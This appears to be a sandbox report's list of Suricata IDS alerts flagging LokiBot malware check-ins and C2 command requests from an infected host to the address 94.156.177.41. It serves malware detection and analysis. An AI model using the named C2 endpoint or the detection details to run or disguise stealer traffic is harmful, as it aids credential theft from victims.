Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50006 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49964 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49964 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49964 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49964 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50013 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50013 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50013 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50013 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50014 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50087 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50087 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50087 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49999 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50087 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49999 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49999 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49999 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50092 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50092 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50092 -> 94.156.177.41:80
